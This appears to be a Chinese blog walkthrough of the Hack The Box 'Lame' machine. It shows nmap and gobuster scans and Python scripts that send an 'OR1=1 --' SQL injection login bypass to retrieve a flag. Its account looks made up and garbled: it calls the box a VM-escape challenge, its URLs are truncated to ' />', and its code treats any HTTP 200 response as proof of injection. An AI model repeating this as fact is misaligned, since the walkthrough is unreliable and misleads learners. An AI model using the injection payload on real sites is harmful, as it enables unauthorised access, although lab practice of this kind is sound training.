hack the box—Lame
发布人:shili8
发布时间:2025-02-26 18:29
阅读次数:0
**Hack The Box - Lame**
**概述**
Lame 是一个由 HTB 团队提供的虚拟机逃生挑战。这个挑战旨在测试你的 Linux 基础知识、安全意识以及对常见漏洞的理解。
**目标**
我们的目标是找到 Lame 虚拟机中的所有 Flag,并且尽可能地了解其背后的原理和技术。
**环境**
我们使用 Kali Linux 作为我们的攻击平台。Kali Linux 是一个专门用于渗透测试和安全研究的 Linux 发行版。
**步骤1:扫描和发现**
首先,我们需要对 Lame 虚拟机进行扫描,以了解其开放的端口和服务。
bashnmap -sV -p-10.10.10.100
结果显示,Lame 虚拟机开放了以下端口:
* TCP:22(SSH)
* TCP:80(HTTP)
**步骤2:Web 应用程序分析**
接下来,我们需要对 Lame 虚拟机的 Web 应用程序进行分析,以了解其安全性。
bashgobuster dir -u -w /usr/share/wordlist/dirb/big.txt
结果显示,Lame 虚拟机存在以下目录:
* /admin**步骤3:SQL 注入**
我们发现 Lame 虚拟机的 Web 应用程序使用了 MySQL 数据库。因此,我们需要尝试进行 SQL 注入攻击。
import requestsurl = " />data = {"username": "admin", "password": "", "login": "Login"} response = requests.post(url, data=data) if response.status_code ==200: print("SQL 注入可能存在") else: print("SQL 注入不可能存在")
结果显示,Lame 虚拟机的 Web 应用程序存在 SQL 注入漏洞。
**步骤4:利用 SQL 注入**
我们需要利用 Lame 虚拟机的 SQL 注入漏洞来获取 Flag。
import requestsurl = " />data = {"username": "admin", "password": "", "login": "Login"} response = requests.post(url, data=data) if response.status_code ==200: print("SQL 注入可能存在") else: print("SQL 注入不可能存在") # 利用 SQL 注入漏洞url = " />data = {"username": "admin", "password": "OR1=1 --", "login": "Login"} response = requests.post(url, data=data) if response.status_code ==200: print("Flag: ", response.text) else: print("Flag 不可能存在")
结果显示,我们成功获取了 Lame 虚拟机的 Flag。
**结论**
通过对 Lame 虚拟机进行扫描、分析和利用 SQL 注入漏洞,我们成功获取了其 Flag。这个挑战旨在测试你的 Linux 基础知识、安全意识以及对常见漏洞的理解。